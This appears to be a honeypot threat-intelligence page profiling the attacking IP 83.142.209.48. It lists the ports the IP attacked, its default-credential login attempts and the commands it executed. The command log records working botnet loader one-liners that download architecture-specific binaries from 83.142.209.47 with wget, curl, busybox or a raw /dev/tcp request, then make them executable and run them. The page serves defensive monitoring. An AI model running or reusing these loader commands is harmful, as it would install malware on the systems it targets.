TROYANOSYVIRUS
Active Threat: CRITICAL

83.142.209.48

Country of Origin: 🇳🇱 Netherlands
First Detected: 02/03/2026
Last Activity: 30/03/2026
ISP: Ghosty Networks LLC
🎯 Total Attacks: 53
🔌 Ports: 6
📡 Attack Types: 7
🦠 Malware: 4

Geolocation

Country: 🇳🇱 Netherlands
City: Unknown
ASN: AS205759
ISP: Ghosty Networks LLC

Attack Types

ssh_telnet_honeypot
yaml_exploit_honeypot
redis_honeypot
adb_honeypot
malware_capture
web_honeypot
tcp_trap

Attacked Ports

23, 80, 81, 2375, 5555, 6379

Associated Malware

Attempted Credentials

🔐 root/root
2x
🔐 admin/admin
2x

Executed Commands

$ uname -m
11x
$ admin
2x
$ password
2x
$ cd /tmp;s=%s;p=%d;wget -q http://$s:$p/$(uname -m) -O .x&&chmod +x .x&&./.x||curl -so .x http://$s:$p/$(uname -m)&&chmod +x .x&&./.x||busybox wget http://$s:$p/$(uname -m) -O .x&&chmod +x .x&&./.x||wget -q http://$s:$p/dlr.$(uname -m) -O dlr&&chmod +x dlr&&./dlr||curl -so dlr http://$s:$p/dlr.$(uname -m)&&chmod +x dlr&&./dlr
1x
$ exec 3 <> /dev/tcp/83.142.209.47/80
1x
$ while read l <& 3
1x
$ /tmp/dlr
1x
$ cd /tmp;wget -q http://83.142.209.47:80/$(uname -m) -O .x && chmod +x .x && ./.x || curl -so .x http://83.142.209.47:80/$(uname -m) && chmod +x .x && ./.x || busybox wget http://83.142.209.47:80/$(uname -m) -O .x && chmod +x .x && ./.x || wget -q http://83.142.209.47:80/dlr.$(uname -m) -O dlr && chmod +x dlr && ./dlr || curl -so dlr http://83.142.209.47:80/dlr.$(uname -m) && chmod +x dlr && ./dlr
1x
$ exec 3<>/dev/tcp/83.142.209.47/80;echo -ne 'GET /dlr.'$(uname -m)' HTTP/1.0\r\n\r\n'>&3;while read l<&3;do [ -z "$l" ]&&break;done;cat<&3>/tmp/dlr;chmod +x /tmp/dlr;/tmp/dlr
1x
$ break
1x

Shodan InternetDB Exposure

InternetDB data, not real-time

Ports
226881
CPEs
cpe:/a:openbsd:openssh:8.9p1
cpe:/o:canonical:ubuntu_linux

Risk Assessment

80/100
Low / Medium / High / Critical